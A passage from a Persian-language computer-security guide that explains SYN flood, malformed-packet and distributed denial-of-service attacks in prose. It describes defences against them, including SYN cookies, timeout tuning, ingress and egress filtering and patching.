‫ﺍﻫﻤﻴﺖ ﺍﺳﺖ‪ .‬ﺑﻬﺘﺮ ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻃﻼﻉ ﺍﺯ ﭼﮕﻮﻧﮕﻲ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﺴﺘﻨﺪﺍﺕ ﻓﺮﻭﺷﻨﺪﻩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪ .‬ﺳـﻨﺪ ﻣـﺸﺎﻭﺭﻩﺍﻱ ‪ CERT/CC‬ﺑـﻪ‬
‫ﺷﻤﺎﺭﺓ ‪) CA-1998-01‬ﻛﻪ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺁﻥ ﻣﻮﺟﻮﺩ ﺍﺳﺖ( ﺟﺰﺋﻴﺎﺕ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺞ ﺑﺮﺍﻱ ﺗﻮﻗﻒ ﻭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﺮﻭﺯ‬
‫ﭼﻨﻴﻦ ﺍﺭﺳﺎﻟﻬﺎﻳﻲ ﺭﺍ ﺷﺮﺡ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﻴﺸﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﻬﺎﺟﻢ ﻛﻪ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ ﺗﺼﺎﺩﻓﻲ ﺑﻌﻨﻮﺍﻥ ﺁﺩﺭﺱ ﻣﺒﺪﺃ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﺗـﺎ‬
‫ﺍﺣﺘﻤﺎﻝ ﺁﺷﻜﺎﺭ ﺷﺪﻥ ﺣﻤﻠﻪ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﻨﺪ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺻﺎﻓﻴﻬﺎﻱ ﺧﺮﻭﺟﻲ ﺭﻭﻱ ﻣـﺴﻴﺮﻳﺎﺑﻬﺎﻱ ﻣـﺮﺯﻱ‪ ،‬ﻫـﺮ ﺍﺯ ﭼﻨـﺪﮔﺎﻩ ﺟﻠـﻮﻱ ﻣـﺸﺎﺭﻛﺖ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺭﺍ ﻣﻲﮔﻴﺮﻧﺪ ‪ -‬ﻭ ﺍﮔﺮ ﺁﻧﻬﺎ ﻫﻤﭽﻨﺎﻥ ﺩﺭ ﺍﻳﻦ ﺣﻤﻼﺕ ﺩﺭﮔﻴﺮ ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ‪ ،‬ﺳﺎﺩﻩﺗﺮ‬
‫ﻣﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺭﺩﻳﺎﺑﻲ ﻛﺮﺩ‪ ،‬ﭼﻮﻥ ﺑﺴﺘﻪﻫﺎﻱ ﺣﻤﻠﻪ ﺩﺍﺭﺍﻱ ﺁﺩﺭﺳﻬﺎﻱ ﺑﺎﺯﮔﺸﺖ ﺻﺤﻴﺤﻲ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪.‬‬

‫ﺣﻤﻼﺕ ﺍﻧﺴﺪﺍﺩ )ﺣﻤﻼﺕ ﺳﻴﻞ ‪(SYN‬‬


‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ‪ TCP/IP‬ﺭﻭﻱ ﺑﺮﺧﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺑﻪ ﻃﺮﻕ ﮔﻮﻧﺎﮔﻮﻥ ﺍﻣﻜﺎﻥ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺁﻭﺭﺩ‪ .‬ﻳﻜﻲ ﺍﺯ ﺭﺍﻫﻬـﺎﻱ‬
‫ﻦ ﺍﺗﺼﺎﻟﻬﺎﻱ ﻧﻴﻤﻪﺑﺎﺯ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﺗﺼﺎﻟﻬﺎﻱ ‪ TCP‬ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻲ ﺑﻪ ﻧﺎﻡ "ﺩﺳﺖﺩﺍﺩﻥ ﭼﻨﺪﻣﺮﺣﻠﻪﺍﻱ"‬ ‫ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺣﺪﺍﻛﺜ ﹺﺮ ﻣﻤﻜ ﹺ‬
‫ﺑﺮﺍﻱ ﺑﺎﺯﻛﺮﺩﻥ ﻳﻚ ﺍﺗﺼﺎﻝ ﻭ ﺗﻨﻈﻴﻢ ﭘﺎﺭﺍﻣﺘﺮﻫﺎﻱ ﺁﻥ ﺍﺗﺼﺎﻝ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﮔﺮ ﻳﻚ ﻣﻬﺎﺟﻢ ﭼﻨﺪ ﭘﻴﺎ ﹺﻡ ﺍﻳﺠـﺎﺩ ﺍﺭﺗﺒـﺎﻁ )ﺑـﺴﺘﻪﻫـﺎﻱ ‪(SYN‬‬
‫ﺑﻔﺮﺳﺘﺪ ﺍﻣﺎ ﻣﺮﺍﺣﻞ ﺑﻌﺪﻱ ﺍﻳﺠﺎﺩ ﺍﺗﺼﺎﻝ ﺭﺍ ﺍﻧﺠﺎﻡ ﻧﺪﻫﺪ‪ ،‬ﭼﻨﺪﻳﻦ ﺍﺗﺼﺎﻝ ﺩﺭ ﺳﻤﺖ ﮔﻴﺮﻧﺪﻩ ﻧﻴﻤﻪﺑﺎﺯ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨﺪ ﻭ ﻣﻨﺎﺑﻊ ﻣﺤﺪﻭﺩ ﺁﻧﺮﺍ ﺍﺷﻐﺎﻝ‬
‫ﻻ ﺍﻳﻦ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺍﺗﺼﺎﻝ ﺩﺍﺭﺍﻱ ﺁﺩﺭﺳﻬﺎﻱ ﻣﺒﺪﺃ ﺟﻌﻠﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﻴﺰﺑﺎﻧﻬﺎﻳﻲ ﻏﻴﺮﻭﺍﻗﻌﻲ ﻳﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ‬ ‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺑﻮﺩﻩ ﻭ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺁﻧﻬﺎ ﻏﻴﺮﻣﻤﻜﻦ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺭﺍﻫﻲ ﻧﻴﺰ ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﻣﺒﺪﺃ ﺁﻧﻬﺎ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﺍﻳﻦ ﺍﺗﺼﺎﻻﺕ ﻧﻴﻤﻪﺑﺎﺯ ﺗﺎ ﺯﻣـﺎﻧﻲ‬
‫ﻛﻪ ﺯﻣﺎﻥ ﺣﻴﺎﺕ ﺁﻧﻬﺎ ﺑﻪ ﭘﺎﻳﺎﻥ ﺑﺮﺳﺪ )ﻳﺎ ﺗﺎ ﺯﻣﺎﻧﻲ ﻛﻪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﺩﻭﺑﺎﺭﻩ ﻓﺮﺳﺘﺎﺩﻩ ﺷـﻮﻧﺪ( ﺑـﺎﻗﻲ ﻣـﻲﻣﺎﻧﻨـﺪ‪ .‬ﺑـﻪ ﺍﻳـﻦ ﺣﻤـﻼﺕ‪ ،‬ﺣﻤـﻼﺕ ﺳـﻴﻞ‬
‫‪ ٣١٢SYN‬ﻭ ﻳﺎ ﺑﻄﻮﺭ ﺳﺎﺩﻩﺗﺮ ﺣﻤﻼﺕ ﺍﻧﺴﺪﺍﺩ‪ ٣١٣‬ﻣﻲﮔﻮﻳﻨﺪ‪.‬‬
‫ﺭﺍﻩﺣﻠﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺭﻓﻊ ﺗﻬﺪﻳﺪ ﺣﻤﻼﺕ ﺳﻴﻞ ‪ SYN‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﻌﻀﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺗﺸﺨﻴﺺ ﻣﻲﺩﻫﻨـﺪ ﻛـﻪ ﻣـﻮﺭﺩ‬
‫ﻳﻚ ﺣﻤﻠﺔ ﺳﻴﻞ ‪ SYN‬ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﻭ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻥ‪ ،‬ﺯﻣﺎﻥ ﺣﻴﺎﺕ ﺗﻤﺎ ﹺﻡ ﺑﺴﺘﻪﻫﺎﻱ ‪ SYN‬ﺭﺍ ﭘﺎﻳﻴﻦ ﻣﻲﺁﻭﺭﻧـﺪ‪ .‬ﻳـﻚ ﺭﺍﻩ ﺩﻳﮕـﺮ ﺍﻳـﻦ‬
‫ﻻ ﻫﻨﮕﺎﻡ‬
‫ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﺟﺪﻭﻝ ﺍﺗﺼﺎﻻﺕ ﻧﻴﻤﻪﺑﺎﺯ ﭘﺮ ﺷﻮﺩ‪ ،‬ﻫﺮﺑﺎﺭ ﻳﻜﻲ ﺍﺯ ﺧﺎﻧﻪﻫﺎﻱ ﺁﻧﺮﺍ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﺩﻭﺭ ﻣﻲﺭﻳﺰﺩ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺟﺪﻭﻝ ﻣﻌﻤﻮ ﹰ‬
‫ﺣﻤﻠﻪ ﭘﺮ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﺣﺘﻤﺎﻝ ﺍﻳﻨﻜﻪ ﻳﻜﻲ ﺍﺯ ﺑﺴﺘﻪﻫﺎﻱ ﺗﻬﺎﺟﻤﻲ ﺩﻭﺭ ﺭﻳﺨﺘﻪ ﺷﻮﺩ ﺯﻳﺎﺩ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﻧﻬﺎﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ‪cookie‬ﻫﺎﻱ ‪ SYN‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ TCP‬ﻳـﻚ ﭘﻴـﺎﻡ ‪SYN+ACK‬‬
‫ﺑﻪ ﺳﻤﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ‪ TCP‬ﻣﻲﻓﺮﺳﺘﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺑﺎﺯﺳﺎﺯﻱ ﻗﺴﻤﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﺍﺗﺼﺎﻝ ‪ TCP‬ﻧﻴﺰ ﻭﺟﻮﺩ‬
‫ﺩﺍﺭﺩ‪ ،‬ﻭ ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺘﻮﺍﻧﺪ ‪ SYN‬ﺍﻭﻟﻴﻪ ﺭﺍ ﺍﺯ ﺟﺪﻭﻝ ﺧﻮﺩ ﺣﺬﻑ ﻛﻨﺪ‪ .‬ﻭﻗﺘﻲ ﭘﻴﺎﻡ ‪ACK‬‬
‫ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺩﺭﻳﺎﻓﺖ ﺷﺪ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ SYN‬ﺍﻭﻟﻴﻪ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺯﺳﺎﺯﻱ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﺗﺼﺎﻝ ﺑﺎ "ﺩﺳﺖﺩﺍﺩﻥ ﺳـﻪﻃﺮﻓـﻪ"‬
‫ﻛﺎﻣﻞ ﻣﻲﺷﻮﺩ ﻭ ﺳﭙﺲ ﺷﺮﻭﻉ ﺑﻪ ﻛﺎﺭ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ‪ ،‬ﺑﺮﻗﺮﺍﺭﻱ ﺍﺗﺼﺎﻝ ‪ TCP‬ﺑﻪ ﻓﺮﺁﻳﻨﺪﻱ ﻣﺴﺘﻘﻞ ﺍﺯ ﻭﺿﻌﻴﺖ‪ ٣١٤‬ﺗﺒﺪﻳﻞ‬
‫ﻣﻲﮔﺮﺩﺩ‪.‬‬

‫‪312 SYN Flood Attacks‬‬


‫‪313 Clogging‬‬
‫‪314 Stateless‬‬
‫‪٤١٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫‪cookie‬ﻫﺎﻱ ‪ SYN‬ﺗﻮﺳﻂ ﺩﺍﻧﻴﹺﻞ ﺑﺮﻧﺸﺘﺎﻳﻦ‪ ٣١٥‬ﺍﺑﺪﺍﻉ ﺷﺪﻧﺪ ﻭ ﺩﺭ ﺁﺩﺭﺱ ‪ http://cr.yp.to/syncookies.html‬ﺑﻪ ﺗﻔﺼﻴﻞ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺁﻧﻬﺎ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ BSD‬ﻭ ‪ Linux‬ﺣﺎﻭﻱ ﻳﻚ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﺯ ‪cookie‬ﻫﺎﻱ ‪ SYN‬ﻫﺴﺘﻨﺪ‪) .‬ﺍﻟﺒﺘﻪ ﺍﻳﻦ ﮔﺰﻳﻨﻪ ﺑﺎﻳﺪ ﺩﺭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Linux‬ﺻﺮﺍﺣﺘﹰﺎ ﻓﻌﺎﻝ ﺷﻮﺩ‪(.‬‬
‫ﺑﺮﺧﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﻧﺤﻮﺓ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺍﺗﺼﺎﻟﻬﺎﻱ ﻧﻴﻤﻪﺑﺎﺯ ﺩﺭ ﺻﻒ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ‪ .‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﻃـﻮﻝ ﺻـﻒ ﺭﺍ ﺯﻳـﺎﺩ‬
‫ﻛﻨﻴﺪ‪ ،‬ﻭ ﻳﺎ ﺯﻣﺎﻥ ﺣﻴﺎﺕ ﺍﺗﺼﺎﻟﻬﺎﻱ ﻧﻴﻤﻪﺑﺎﺯ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﻴﺪ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﻧﻴﺰ ﺍﺯ ﻧﻈﺮ ﺷﻜﻞ ﻛﺎﺭﻛﺮﺩ ﻏﻴﺮﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﺳﺖ ﻭ ﺩﺭﺻﻮﺭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺁﻥ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺑﻪ ﺩﺳﺘﻜﺎﺭﻱ ﻣﺘﻐﻴﺮﻫﺎﻱ ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻧﻴﺎﺯ ﭘﻴﺪﺍ ﻛﻨﻨﺪ‪ .‬ﺑـﺮﺍﻱ ﻣـﻮﺍﺭﺩ ﺧـﺎﺹ ﺑـﻪ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﺓ‬
‫ﻣﺤﺼﻮﻻﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺧﻮﺩ ﺭﺟﻮﻉ ﻛﻨﻴﺪ‪.‬‬

‫‪٣١٦‬‬
‫ﺣﻤﻼﺕ ﺗﺮﺍﻓﻴﻚ ﺑﺪﺷﻜﻞ‬
‫ﺩﺭ ﮔﺬﺷﺘﻪ‪ ،‬ﺍﺷﻜﺎﻻﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺳﻄﻮﺡ ﭘﺎﻳﻴﻦ ﺷﺒﻜﻪ ﺑﺎﻋﺚ ﻣﻲﺷﺪﻧﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﻳﻚ ﺑﺴﺘﻪ ﻳﺎ ﺩﺭﺧﻮﺍﺳﺖ ﺑﺪﺷﻜﻞ‪HTTP‬‬
‫ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻓﺘﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻧﻮﻋﻲ ﺣﻤﻠﻪ ﻣﻌﺮﻭﻑ ﺑﻪ ﭘﮋﻭﺍﮎ ﻣﺮﮒ‪ ٣١٧‬ﻫﺮﺩﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﻭ ‪ Unix‬ﺭﺍ ﺑﺎ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﺑﺴﺘﺔ‬
‫‪ ICMP‬ﻛﻪ ﻃﻮﻻﻧﻲﺗﺮ ﺍﺯ ﺍﻧﺪﺍﺯﺓ ﻣﺠﺎﺯ ﺑﻮﺩ ﺍﺯ ﻛﺎﺭ ﻣﻲﺍﻧﺪﺍﺧﺖ‪ .‬ﺗﺠﻬﻴﺰﺍﺕ ﺷﺒﻜﻪﺍﻱ ﺯﻳﺎﺩﻱ ﺍﺯ ﺟﻤﻠﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭼﺎﭘﮕﺮ‪ ،‬ﺩﻳﻮﺍﺭﻩﻫﺎﻱ‬
‫ﺁﺗﺶ ﺧﺎﻧﮕﻲ‪ ،‬ﻭ ﺣﺘﻲ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ‪ ،‬ﻫﻨﮕﺎﻣﻴﮑﻪ ﺑﺪﻧﺒﺎﻝ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ‪ IIS‬ﻳﺎ ‪ Apache‬ﻛﺎﻭﺵ ﻣﻲﺷﺪﻧﺪ‪ ،‬ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻩﺍﻧﺪ‪ .‬ﺑﻄﻮﺭ ﻛﻠﻲ ﺗﻨﻬﺎ‬
‫ﺭﺍﻩ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺗﺮﺍﻓﻴﻚ ﺑﺪﺷﻜﻞ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﻌﻨﻮﺍﻥ ‪ proxy‬ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺑﻪﺭﻭﺯ ﺑﻮﺩﻥ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺖ‪.‬‬

‫ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺗﻮﺯﻳﻊﺷﺪﻩ‬


‫ﻣﻀﺮﺗﺮﻳﻦ ﺣﻤﻼﺕ ﺷﺒﻜﻪﺍﻱ‪ ،‬ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺗﻮﺯﻳﻊﺷﺪﻩ )‪DDoS‬ﻫﺎ(‪ ٣١٨‬ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﻳﻚ ﺣﻤﻠﺔ ‪ ،DDoS‬ﻣﻬﺎﺟﻢ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ‬
‫ﺭﺍ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻳﺎ ﺳﻴﻠﻲ ﺍﺯ ﭘﻴﺎﻣﻬﺎ ﺭﺍ ﺑﻪ ﺷﺒﻜﻪ ﻣﻲﻓﺮﺳﺘﺪ‪ ،‬ﺍﻣﺎ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﺯ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﻣﻴﺰﺑﺎﻥ ﺗﻮﺯﻳﻊﺷﺪﺓ ﻣﺨﺘﻠﻒ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺩﻫﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎﻛﻪ ﺑﺴﺘﻪﻫﺎ ﺍﺯ ﺗﻨﻬﺎ ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﻤﻲﺁﻳﻨﺪ‪ ،‬ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﺁﻧﻬﺎ ﺑﺎ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻏﺮﺑﺎﻝﺳﺎﺯ ﺑﺴﺘﻪﻫﺎ ﻛﺎﺭ ﺩﺷﻮﺍﺭﻱ ﺍﺳـﺖ؛‬
‫ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻣﻴﺰﺑﺎﻧﻬﺎ ﺭﺍ ﺑﻜﻠﻲ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺟﺪﺍ ﻛﻨﻴﺪ‪.‬‬
‫ﻻ ﺍﺯ ﻃﺮﻳﻖ ﻳﻜﺴﺮﻱ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﭘﻴﺮﻭ‪ zombie) ٣١٩‬ﻳﺎ ﺗﺮﺍﻭﺍ( ﺍﻧﺠﺎﻡ ﻣﻲﭘـﺬﻳﺮﺩ‪ ،‬ﻛـﻪ ﺩﺭ ﻣﻴﺰﺑﺎﻧﻬـﺎﻱ ﺩﺳـﺘﻜﺎﺭﻱﺷـﺪﻩ‬ ‫ﺣﻤﻼﺕ ‪ DDoS‬ﻣﻌﻤﻮ ﹰ‬
‫ﻧﺼﺐ ﺷﺪﻩﺍﻧﺪ ﻭ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺩﺭ ﺣﻤﻠﻪ ﻋﻠﻴﻪ ﻳﻚ ﻣﻘﺼﺪ ﻣﺸﺨﺺ ﺑﻜﺎﺭ ﮔﻴﺮﺩ‪ .‬ﻳﻚ ﺭﺍﻩﺣﻞ ﻛﻠﻴﺪﻱ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ‬
‫ﻭﻗﻮﻉ ﺣﻤﻼﺕ ‪) DdoS‬ﭼﻪ ﺍﻳﻨﻜﻪ ﺣﻤﻠﻪ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﻤﺎ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﻭ ﻳﺎ ﺣﻤﻠﻪﺍﻱ ﺍﺯ ﻃﺮﻳﻖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﻤﺎ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ(‪ ،‬ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎ ﺩﺭ‬
‫ﺑﺮﺍﺑﺮ ﺩﺳﺘﻜﺎﺭﻱ ﺷﺪﻥ ﺍﺳﺖ ﺗﺎ ﺩﺭ ﺣﻤﻼﺕ ﺩﻳﮕﺮ ﺍﺯ ﺁﻧﻬﺎ ﺑﻌﻨﻮﺍﻥ ‪ zombie‬ﺍﺳﺘﻔﺎﺩﻩ ﻧـﺸﻮﺩ‪ .‬ﺩﺭ ﺳـﻄﺢ ﺷـﺒﻜﻪ‪ ،‬ﮔﺬﺍﺷـﺘﻦ ﺻـﺎﻓﻲ ﻭﺭﻭﺩﻱ ﻭ‬
‫ﺧﺮﻭﺟﻲ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺧﺮﻭﺝ ﺑﺴﺘﻪﻫﺎﻱ ﺑﺎ ﺁﺩﺭﺱ ﻣﺒﺪﺃ ﻗﻼﺑﻲ ﺍﺯ ﺷﺒﻜﺔ ﻣﺤﻠﻲ‪ ،‬ﺟﻠﻮﻱ ﺩﺧﻴﻞ ﺷـﺪﻥ ﻣﺎﺷـﻴﻨﻬﺎﻱ ﺩﺍﺧﻠـﻲ ﺩﺭ ﺣﻤـﻼﺕ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫‪٣٢٠‬‬
‫‪ DDoS‬ﺭﺍ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫ﺣﻤﻼﺕ ‪ DDoS‬ﻧﻴﺎﺯ ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﺎﺻﻲ ﻧﺪﺍﺭﻧﺪ‪ .‬ﻳﻚ ﺷﻜﻞ ﺣﻤـﻼﺕ ‪ DDoS‬ﺗﻨﻬـﺎ ﺑـﺎ ﻓﺮﺳـﺘﺎﺩﻥ ﺑـﺴﺘﻪﻫـﺎﻱ ﭘـﮋﻭﺍﻙ ‪ ٣٢١ICMP‬ﺑـﺎ‬
‫ﺁﺩﺭﺳﻬﺎﻱ ﻣﺒﺪﺃ ﻗﻼﺑﻲ ﺑﻪ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﭘﺎﺳﺦ ﻣﺮﺑﻮﻁ ﺑﻪ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﺭﺍﻳﺎﻧـﺔ ﻗﺮﺑـﺎﻧﻲ‬
‫ﺑﺮﮔﺸﺖ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺭﻭﺷﻲ ﺩﻳﮕﺮ‪ ،‬ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻌﺪﺍﺩﻱ ﺍﺗﺼﺎﻝ ‪ TCP‬ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﻧﺎﻣﻮﺟﻮﺩ ﺗـﻼﺵ ﻣـﻲﺷـﻮﺩ‪ .‬ﻣﺎﺷـﻴﻦ‬
